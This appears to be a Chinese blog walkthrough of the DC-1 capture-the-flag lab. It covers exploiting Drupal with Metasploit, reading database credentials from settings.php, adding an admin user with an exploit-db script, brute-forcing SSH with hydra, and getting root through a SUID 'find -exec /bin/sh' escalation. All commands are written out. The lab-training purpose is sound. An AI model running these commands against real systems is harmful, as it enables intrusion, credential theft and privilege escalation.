DC 1的实战操作思路(文章末尾靶场下载链接)
2023-5-6 19:32:10 Author: 白安全组(查看原文) 阅读量:17 收藏

打开靶场,登录账号密码:

roottoor

然后我们查看ifconfig,访问IP地址可以直接进入靶场


首先进入这个靶场中,我们先了解了这个靶场的cms,是Drupal

首先尝试第一种方式:

我们使用kali中的msf框架进行一个漏洞利用

搜索drupal可利用的漏洞模块

search drupal

我们可以选择一种攻击模块进行尝试。

我这里随便选择了一个,我们查看该模块的配置信息

主要配置信息是rhosts,我们设置一下目标地址

我们直接开始攻击

进去之后可以利用shell,查看当前目录下的内容,找到flag1.txt

提示:

目标cms的关键有一个配置文件目录

/var/www/sites/default/settings.php

我们上面拿到了shell,所以我们这里就可以直接通过shell来查看这个配置文件中的内容

flag2就是这个配置文件,从这个配置文件中我们获取了数据库登录的账号和密码

账号:dbuser

密码:R0ck3t

下面我们需要登录数据库,先优化一下界面,使用python的pty

python -c 'import pty;pty.spawn("/bin/bash")'

连接进数据库中

mysql -udbuser -pR0ck3t

我们进行常规查询命令

show databases;use drupaldb;show tables;

查看users表

select * from users;

有两种方法:

第一种利用密码重置建立一个账户

该cms自带的,忘记密码时执行的语句

php scripts/password-hash.sh 【自定密码】

第二种利用漏洞建立一个用户

我们搜索kali中自带的一些漏洞利用脚本

searchploit drupal

找到下面这个脚本

然后我们记下这个脚本的位置,开始使用

python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.0.103 -u bai -p 123456

后面是目标地址,用户名和用户密码

然后使用新添加的账号就可以登录了。

下一步,我们查看一下服务器中的passwd文件,发现有一个flag4用户,但是shadow文件无法查看,所以我们尝试使用hydra破解 一下密码,使用kali内置的字典。

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt 192.168.0.103 ssh

这里我们使用ssh,也就是爆破22端口

这里爆破出密码,我们就可以使用这个账户来远程登录了

ssh flag4@192.168.0.103

我们现在已经成功登录上去了

这里我们就找到flag4

我们到root根目录下,找到了最后一个flag

这里我们需要提权到root权限

我们查看一下可以使用哪些命令来执行root权限

find / -perm -u=s -type f 2>/dev/null


这里我们可以找到这些命令用来提权

我们要利用find命令提权的话,就需要当前目录下搜索一个文件,当前目录下要是没有可以touch创建一个,当前目录下有一个flag4.txt

我们输入

find / -name flag4.txt -exec "/bin/sh" \;

这里我们就成功提权,可以查看最后一个flag

关注公众号发送

dc1

获取靶场文件

扫描二维码关注我们吧!


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486506&idx=1&sn=b775cc074add893ac02b329c52a71a32&chksm=fdb4db71cac3526778757657cc6a315c8cafc32d9ac0154cc91609762f9770f2d7844001f0a1#rd
如有侵权请联系:admin#unsafe.sh